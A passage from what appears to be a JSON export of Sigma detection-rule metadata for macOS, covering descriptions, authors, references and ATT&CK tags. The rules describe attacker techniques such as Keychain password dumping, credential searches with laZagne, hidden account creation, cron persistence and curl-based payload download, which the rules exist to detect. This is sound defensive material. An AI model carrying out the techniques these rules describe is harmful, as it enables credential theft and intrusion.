"proc_creation_macos_network_service_scanning.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_network_service_scanning.yml" ], "tags": [ "attack.discovery", "attack.t1046" ] }, "related": [ { "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "84bae5d4-b518-4ae0-b331-6d4afd34d00f", "value": "MacOS Network Service Scanning" }, { "description": "Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This rule detect using dd and truncate to add a junk data to file.", "meta": { "author": "Igor Fits, Mikhail Larin, oscd.community", "creation_date": "2020-10-19", "falsepositive": [ "Legitimate script work" ], "filename": "proc_creation_macos_binary_padding.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.001/T1027.001.md", "https://linux.die.net/man/1/dd", "https://linux.die.net/man/1/truncate", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_binary_padding.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027.001" ] }, "related": [ { "dest-uuid": "5bfccc3f-2326-4112-86cc-c1ece9d8a2b5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "95361ce5-c891-4b0a-87ca-e24607884a96", "value": "Binary Padding - MacOS" }, { "description": "Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.", "meta": { "author": "Alejandro Ortuno, oscd.community", "creation_date": "2020-10-06", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_macos_schedule_task_job_cron.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_schedule_task_job_cron.yml" ], "tags": [ "attack.execution", "attack.persistence", "attack.privilege-escalation", "attack.t1053.003" ] }, "related": [ { "dest-uuid": "2acf44aa-542f-4366-b4eb-55ef5747759c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7c3b43d8-d794-47d2-800a-d277715aa460", "value": "Scheduled Cron Task/Job - MacOs" }, { "description": "Detection use of the command \"split\" to split files into parts and possible transfer.", "meta": { "author": "Igor Fits, Mikhail Larin, oscd.community", "creation_date": "2020-10-15", "falsepositive": [ "Legitimate administrative activity" ], "filename": "proc_creation_macos_split_file_into_pieces.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1030/T1030.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_split_file_into_pieces.yml" ], "tags": [ "attack.exfiltration", "attack.t1030" ] }, "related": [ { "dest-uuid": "c3888c54-775d-4b2f-b759-75a2ececcbfd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7f2bb9d5-6395-4de5-969c-70c11fbe6b12", "value": "Split A File Into Pieces" }, { "description": "Detects suspicious child processes spawning from microsoft office suite applications such as word or excel. This could indicates malicious macro execution", "meta": { "author": "Sohan G (D4rkCiph3r)", "creation_date": "2023-01-31", "falsepositive": [ "Unknown" ], "filename": "proc_creation_macos_office_susp_child_processes.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://redcanary.com/blog/applescript/", "https://objective-see.org/blog/blog_0x4B.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_office_susp_child_processes.yml" ], "tags": [ "attack.execution", "attack.persistence", "attack.t1059.002", "attack.t1137.002", "attack.t1204.002" ] }, "related": [ { "dest-uuid": "37b11151-1776-4f8f-b328-30939fbf2ceb", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "ed7efd4d-ce28-4a19-a8e6-c58011eb2c7a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "69483748-1525-4a6c-95ca-90dc8d431b68", "value": "Suspicious Microsoft Office Child Process - MacOS" }, { "description": "Detects attempts to enable the guest account using the sysadminctl utility", "meta": { "author": "Sohan G (D4rkCiph3r)", "creation_date": "2023-02-18", "falsepositive": [ "Unknown" ], "filename": "proc_creation_macos_sysadminctl_enable_guest_account.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://ss64.com/osx/sysadminctl.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_sysadminctl_enable_guest_account.yml" ], "tags": [ "attack.initial-access", "attack.t1078", "attack.t1078.001" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "6151cbea-819b-455a-9fa6-99a1cc58797d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d7329412-13bd-44ba-a072-3387f804a106", "value": "Guest Account Enabled Via Sysadminctl" }, { "description": "Detects the enumeration of other remote systems.", "meta": { "author": "Alejandro Ortuno, oscd.community", "creation_date": "2020-10-22", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_macos_remote_system_discovery.yml", "level": "informational", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_remote_system_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1018" ] }, "related": [ { "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "10227522-8429-47e6-a301-f2b2d014e7ad", "value": "Macos Remote System Discovery" }, { "description": "Detects execution of AppleScript of the macOS scripting language AppleScript.", "meta": { "author": "Alejandro Ortuno, oscd.community", "creation_date": "2020-10-21", "falsepositive": [ "Application installers might contain scripts as part of the installation process." ], "filename": "proc_creation_macos_applescript.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.002/T1059.002.md", "https://redcanary.com/blog/applescript/", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_applescript.yml" ], "tags": [ "attack.execution", "attack.t1059.002" ] }, "related": [ { "dest-uuid": "37b11151-1776-4f8f-b328-30939fbf2ceb", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1bc2e6c5-0885-472b-bed6-be5ea8eace55", "value": "MacOS Scripting Interpreter AppleScript" }, { "description": "Detects potential suspicious applet or osascript executing \"osacompile\".", "meta": { "author": "Sohan G (D4rkCiph3r), Red Canary (Idea)", "creation_date": "2023-04-03", "falsepositive": [ "Unknown" ], "filename": "proc_creation_macos_suspicious_applet_behaviour.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://redcanary.com/blog/mac-application-bundles/", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_suspicious_applet_behaviour.yml" ], "tags": [ "attack.execution", "attack.t1059.002" ] }, "related": [ { "dest-uuid": "37b11151-1776-4f8f-b328-30939fbf2ceb", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a753a6af-3126-426d-8bd0-26ebbcb92254", "value": "Osacompile Execution By Potentially Suspicious Applet/Osascript" }, { "description": "Detects the use of csrutil to view the Configure System Integrity Protection (SIP) status. This technique is used in post-exploit scenarios.\n", "meta": { "author": "Joseliyo Sanchez, @Joseliyo_Jstnk", "creation_date": "2024-01-02", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_macos_csrutil_status.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://ss64.com/osx/csrutil.html", "https://objective-see.org/blog/blog_0x6D.html", "https://www.virustotal.com/gui/file/05a2adb266ec6c0ba9ed176d87d8530e71e845348c13caf9f60049760c312cd3/behavior", "https://www.welivesecurity.com/2017/10/20/osx-proton-supply-chain-attack-elmedia/", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_csrutil_status.yml" ], "tags": [ "attack.discovery", "attack.t1518.001" ] }, "related": [ { "dest-uuid": "cba37adb-d6fb-4610-b069-dd04c0643384", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "53821412-17b0-4147-ade0-14faae67d54b", "value": "System Integrity Protection (SIP) Enumeration" }, { "description": "Detects enumeration of local systeam accounts on MacOS", "meta": { "author": "Alejandro Ortuno, oscd.community", "creation_date": "2020-10-08", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_macos_local_account.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.001/T1087.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_local_account.yml" ], "tags": [ "attack.discovery", "attack.t1087.001" ] }, "related": [ { "dest-uuid": "25659dd6-ea12-45c4-97e6-381e3e4b593e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ddf36b67-e872-4507-ab2e-46bda21b842c", "value": "Local System Accounts Discovery - MacOs" }, { "description": "Detects when the macOS Script Editor utility spawns an unusual child process.", "meta": { "author": "Tim Rauch (rule), Elastic (idea)", "creation_date": "2022-10-21", "falsepositive": [ "Unknown" ], "filename": "proc_creation_macos_susp_execution_macos_script_editor.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-7f541fbc4a4a28a92970e8bf53effea5bd934604429112c920affb457f5b2685", "https://wojciechregula.blog/post/macos-red-teaming-initial-access-via-applescript-url/", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_execution_macos_script_editor.yml" ], "tags": [ "attack.t1566", "attack.t1566.002", "attack.initial-access", "attack.t1059", "attack.t1059.002", "attack.t1204", "attack.t1204.001", "attack.execution", "attack.persistence", "attack.t1553", "attack.defense-evasion" ] }, "related": [ { "dest-uuid": "a62a8db3-f23a-4d8f-afd6-9dbc77e7813b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "2b742742-28c3-4e1b-bab7-8350d6300fa7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "37b11151-1776-4f8f-b328-30939fbf2ceb", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "ef67e13e-5598-4adc-bdb2-998225874fa9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b83e166d-13d7-4b52-8677-dff90c548fd7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6e4dcdd1-e48b-42f7-b2d8-3b413fc58cb4", "value": "Suspicious Execution via macOS Script Editor" }, { "description": "Detects when a built-in utility is used to decode and decrypt a payload after a macOS disk image (DMG) is executed. Malware authors may attempt to evade detection and trick users into executing malicious code by encoding and encrypting their payload and placing it in a disk image file. This behavior is consistent with adware or malware families such as Bundlore and Shlayer.", "meta": { "author": "Tim Rauch (rule), Elastic (idea)", "creation_date": "2022-10-17", "falsepositive": [ "Unknown" ], "filename": "proc_creation_macos_payload_decoded_and_decrypted.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-5d42c3d772e04f1e8d0eb60f5233bc79def1ea73105a2d8822f44164f77ef823", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_payload_decoded_and_decrypted.yml" ], "tags": [ "attack.t1059", "attack.t1204", "attack.execution", "attack.t1140", "attack.defense-evasion", "attack.s0482", "attack.s0402" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "234dc5df-40b5-49d1-bf53-0d44ce778eca", "value": "Payload Decoded and Decrypted via Built-in Utilities" }, { "description": "Detects the execution of suspicious child processes from macOS installer package parent process. This includes osascript, JXA, curl and wget amongst other interpreters", "meta": { "author": "Sohan G (D4rkCiph3r)", "creation_date": "2023-02-18", "falsepositive": [ "Legitimate software uses the scripts (preinstall, postinstall)" ], "filename": "proc_creation_macos_installer_susp_child_process.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://redcanary.com/blog/clipping-silver-sparrows-wings/", "https://github.com/elastic/detection-rules/blob/4312d8c9583be524578a14fe6295c3370b9a9307/rules/macos/execution_installer_package_spawned_network_event.toml", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_installer_susp_child_process.yml" ], "tags": [ "attack.t1059", "attack.t1059.007", "attack.t1071", "attack.t1071.001", "attack.execution", "attack.command-and-control" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e0cfaecd-602d-41af-988d-f6ccebb2af26", "value": "Suspicious Installer Package Child Process" }, { "description": "Detects the use of tail to extract bytes at an offset from an image and then decode the base64 value to create a new file with the decoded content. The detected execution is a bash one-liner.\n", "meta": { "author": "Joseliyo Sanchez, @Joseliyo_Jstnk", "creation_date": "2023-12-20", "falsepositive": [ "Unknown" ], "filename": "proc_creation_macos_tail_base64_decode_from_image.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://www.virustotal.com/gui/file/483fafc64a2b84197e1ef6a3f51e443f84dc5742602e08b9e8ec6ad690b34ed0/behavior", "https://www.virustotal.com/gui/file/16bafdf741e7a13137c489f3c8db1334f171c7cb13b62617d691b0a64783cc48/behavior", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_tail_base64_decode_from_image.yml" ], "tags": [ "attack.defense-evasion", "attack.t1140" ] }, "related": [ { "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "09a910bf-f71f-4737-9c40-88880ba5913d", "value": "Potential Base64 Decoded From Images" }, { "description": "Detects potential in-memory downloading and compiling of applets using curl and osacompile as seen used by XCSSET malware", "meta": { "author": "Sohan G (D4rkCiph3r), Red Canary (idea)", "creation_date": "2023-08-22", "falsepositive": [ "Unknown" ], "filename": "proc_creation_macos_susp_in_memory_download_and_compile.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://redcanary.com/blog/mac-application-bundles/", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_in_memory_download_and_compile.yml" ], "tags": [ "attack.command-and-control", "attack.execution", "attack.t1059.007", "attack.t1105" ] }, "related": [ { "dest-uuid": "0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "13db8d2e-7723-4c2c-93c1-a4d36994f7ef", "value": "Potential In-Memory Download And Compile Of Payloads" }, { "description": "Identifies the execution traces of the XCSSET malware. XCSSET is a macOS trojan that primarily spreads via Xcode projects and maliciously modifies applications. Infected users are also vulnerable to having their credentials, accounts, and other vital data stolen.", "meta": { "author": "Tim Rauch (rule), Elastic (idea)", "creation_date": "2022-10-17", "falsepositive": [ "Unknown" ], "filename": "proc_creation_macos_xcsset_malware_infection.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset", "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-f5deb07688e1a8dec9530bc3071967b2da5c16b482e671812b864c37beb28f08", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_xcsset_malware_infection.yml" ], "tags": [ "attack.command-and-control" ] }, "uuid": "47d65ac0-c06f-4ba2-a2e3-d263139d0f51", "value": "Potential XCSSET Malware Infection" }, { "description": "Detecting attempts to extract passwords with grep and laZagne", "meta": { "author": "Igor Fits, Mikhail Larin, oscd.community", "creation_date": "2020-10-19", "falsepositive": [ "Unknown" ], "filename": "proc_creation_macos_find_cred_in_files.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_find_cred_in_files.yml" ], "tags": [ "attack.credential-access", "attack.t1552.001" ] }, "related": [ { "dest-uuid": "837f9164-50af-4ac0-8219-379d8a74cefc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "53b1b378-9b06-4992-b972-dde6e423d2b4", "value": "Credentials In Files" }, { "description": "Detects suspicious child processes spawned from browsers. This could be a result of a potential web browser exploitation.", "meta": { "author": "Sohan G (D4rkCiph3r)", "creation_date": "2023-04-05", "falsepositive": [ "Legitimate browser install, update and recovery scripts" ], "filename": "proc_creation_macos_susp_browser_child_process.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://github.com/elastic/detection-rules/blob/4312d8c9583be524578a14fe6295c3370b9a9307/rules/macos/execution_initial_access_suspicious_browser_childproc.toml", "https://fr.slideshare.net/codeblue_jp/cb19-recent-apt-attack-on-crypto-exchange-employees-by-heungsoo-kang", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_browser_child_process.yml" ], "tags": [ "attack.initial-access", "attack.execution", "attack.t1189", "attack.t1203", "attack.t1059" ] }, "related": [ { "dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0250638a-2b28-4541-86fc-ea4c558fa0c6", "value": "Suspicious Browser Child Process - MacOS" }, { "description": "Detects the execution of the nscurl utility in order to download files.", "meta": { "author": "Daniel Cortez", "creation_date": "2024-06-04", "falsepositive": [ "Legitimate usage of nscurl by administrators and users." ], "filename": "proc_creation_macos_nscurl_usage.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://www.agnosticdev.com/content/how-diagnose-app-transport-security-issues-using-nscurl-and-openssl", "https://www.loobins.io/binaries/nscurl/", "https://gist.github.com/nasbench/ca6ef95db04ae04ffd1e0b1ce709cadd", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_nscurl_usage.yml" ], "tags": [ "attack.defense-evasion", "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6d8a7cf1-8085-423b-b87d-7e880faabbdf", "value": "File Download Via Nscurl - MacOS" }, { "description": "Detects creation of a hidden user account on macOS (UserID < 500) or with IsHidden option", "meta": { "author": "Daniil Yugoslavskiy, oscd.community", "creation_date": "2020-10-10", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_macos_create_hidden_account.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.002/T1564.002.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_create_hidden_account.yml" ], "tags": [ "attack.defense-evasion", "attack.t1564.002" ] }, "related": [ { "dest-uuid": "8c4aef43-48d5-49aa-b2af-c0cd58d30c3d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b22a5b36-2431-493a-8be1-0bae56c28ef3", "value": "Hidden User Creation" }, { "description": "Detects the creation of a new user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.", "meta": { "author": "Alejandro Ortuno, oscd.community", "creation_date": "2020-10-06", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_macos_create_account.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md", "https://ss64.com/osx/sysadminctl.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_create_account.yml" ], "tags": [ "attack.t1136.001", "attack.persistence" ] }, "related": [ { "dest-uuid": "635cbe30-392d-4e27-978e-66774357c762", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "51719bf5-e4fd-4e44-8ba8-b830e7ac0731", "value": "Creation Of A Local User Account" }, { "description": "Detects passwords dumps from Keychain", "meta": { "author": "Tim Ismilyaev, oscd.community, Florian Roth (Nextron Systems)", "creation_date": "2020-10-19", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_macos_creds_from_keychain.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.001/T1555.001.md", "https://gist.github.com/Capybara/6228955", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_creds_from_keychain.yml" ], "tags": [ "attack.credential-access", "attack.t1555.001" ] }, "related": [ { "dest-uuid": "1eaebf46-e361-4437-bc23-d5d65a3b92e3", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b120b587-a4c2-4b94-875d-99c9807d6955", "value": "Credentials from Password Stores - Keychain" }, { "description": "Detects usage of base64 utility to decode arbitrary base64-encoded text", "meta": { "author": "Daniil Yugoslavskiy, oscd.community", "creation_date": "2020-10-19", "falsepositive": [ "Legitimate activities" ], "filename": "proc_creation_macos_base64_decode.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_base64_decode.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "719c22d7-c11a-4f2c-93a6-2cfdd5412f68", "value": "Decode Base64 Encoded Text -MacOs" }, { "description": "Detects the execution of \"system_profiler\" with specific \"Data Types\" that have been seen being used by threat actors and malware. It provides system hardware and software configuration information.\nThis process is primarily used for system information discovery. However, \"system_profiler\" can also be used to determine if virtualization software is being run for defense evasion purposes.\n", "meta": { "author": "Stephen Lincoln `@slincoln_aiq` (AttackIQ)", "creation_date": "2024-01-02", "falsepositive": [ "Legitimate administrative activities" ], "filename": "proc_creation_macos_system_profiler_discovery.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://gist.github.com/nasbench/9a1ba4bc7094ea1b47bc42bf172961af", "https://objective-see.org/blog/blog_0x62.html", "https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/", "https://www.trendmicro.com/en_za/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html", "https://ss64.com/mac/system_profiler.html", "https://www.sentinelone.com/wp-content/uploads/pdf-gen/1630910064/20-common-tools-techniques-used-by-macos-threat-actors-malware.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_system_profiler_discovery.yml" ], "tags": [ "attack.discovery", "attack.defense-evasion", "attack.t1082", "attack.t1497.001" ] }, "related": [ { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "29be378d-262d-4e99-b00d-852d573628e6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4809c683-059b-4935-879d-36835986f8cf", "value": "System Information Discovery Using System_Profiler" }, { "description": "Detects usage of system utilities to discover system network connections", "meta": { "author": "Daniil Yugoslavskiy, oscd.community", "creation_date": "2020-10-19", "falsepositive": [ "Legitimate activities" ], "filename": "proc_creation_macos_system_network_connections_discovery.yml", "level": "informational", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_system_network_connections_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1049" ] }, "related": [ { "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9a7a0393-2144-4626-9bf1-7c2f5a7321db", "value": "System Network Connections Discovery - MacOs" }, { "description": "Detects the execution of the \"chflags\" utility with the \"hidden\" flag, in order to hide files on MacOS.\nWhen a file or directory has this hidden flag set, it becomes invisible to the default file listing commands and in graphical file browsers.\n", "meta": { "author": "Omar Khaled (@beacon_exe)", "creation_date": "2024-08-21", "falsepositive": [ "Legitimate usage of chflags by administrators and users." ], "filename": "proc_creation_macos_chflags_hidden_flag.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/", "https://www.sentinelone.com/labs/apt32-multi-stage-macos-trojan-innovates-on-crimeware-scripting-technique/", "https://ss64.com/mac/chflags.html", "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_chflags_hidden_flag.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218", "attack.t1564.004", "attack.t1552.001", "attack.t1105" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { 